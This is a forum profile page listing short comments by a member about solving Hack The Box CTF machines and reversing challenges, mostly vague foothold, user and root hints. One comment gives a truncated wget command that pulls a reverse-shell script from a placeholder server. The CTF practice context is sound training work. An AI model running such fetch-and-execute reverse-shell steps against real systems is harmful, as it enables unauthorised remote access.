waza

About

Username: waza
Joined:
Visits: 208
Last Active:
Roles: Member

Comments

  • Anyone willing to sanity check? I'm sure about the root privesc but it doesn't seem to execute (tried a bunch of stuff tho). Edit: nvm, got it...
  • Pretty easy one! Can't even think of hints that do not disclose it completely! Anyone that needs some help/guidance, pm me! Just say upfront what you have and where you're stuck!
  • Took me a day to solve it without any tooling (besides IDA and its embedded debugger). At first it may seem a bit complex, but as you start pulling the string it becomes more and more evident what you need to actually bypass. Check the file entry po…
    in debugme Comment by waza May 20
  • @alemusix said: (Quote) It is not unstable, it's HTB that thinks that everything is a "race condition" and cleans everything shortly.
  • Oh my lord, my first hard box! Dude, never messed with almost any of these things, but bit by bit I was able to progress (not fast, but progress at least). Took me a WHOLE week, but I assume that when familiar with the technologies it's not something …
  • Foothold: Simple enumeration leads you there. It's ugly to do, but you might need to steal something! If you don't know what to steal, check around what you can do and see. User: Not difficult, the standard enumeration should lead you where you ne…
  • Quite a ride, got it in the end. If somebody is asking why it does work locally, try it in a 32bit system. In mine (64bit) it was not working and a new VM did the trick for testing. If you need help, reach out to me.
  • Nice box, very good to mess with stuff that I never did before! Foothold: Well, a must-check pentesting procedure should lead you there. If you never messed with it (like me), search for that typ key :) User: Did you check everything before getti…
  • Well, I took a bit more time since I never read C++ code (nor its assembly form), but the solution is way easier (and less time consuming) to get than by brute forcing it! That one simple instruction in the middle of it needed a bit of attention! …
  • @Hybr0x said: (Quote) If you have that account with that level of permissions, you have inherent RCE (by design).
  • Hey guys, thanks a lot! I did the academy Windows fundamentals and it was pretty straightforward! Guess I'll upgrade to VIP just to start messing with easy boxes together with some reading on those subjects you suggested.
  • Rooted, quite an easy box actually! Foothold: check the request and play with it. User: old vulnerability, search for it. Root: Never played with Go, but I think it's doable with a bit of research. When exploiting binaries, what is the most useful thi…
  • @aimforthehead said: (Quote) Because it is not that file (I think it's a .j**n, check the docs), and you need to restart the service (to apply the key).
  • Rooted :D Foothold: simple enumeration will guide you to the right place. Enum the right place. Docs. User: And you already have it. Root: Easiest part. The traditional scripts will bloat your screen, you should notice that! (examine the folder. y…
  • @trcm said: (Quote) How are you generating it??
  • What I suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, since special symbols may cause problems. This approach got me good: wget "yourserver/rev.sh" && …
  • Rooted! Why am I so distracted and overlook things??? Contrary to everyone, the user was easier than the root! Might be luck but things just went the right path (even not using docker prior to this)... foot: * look carefully (enumeration) * S…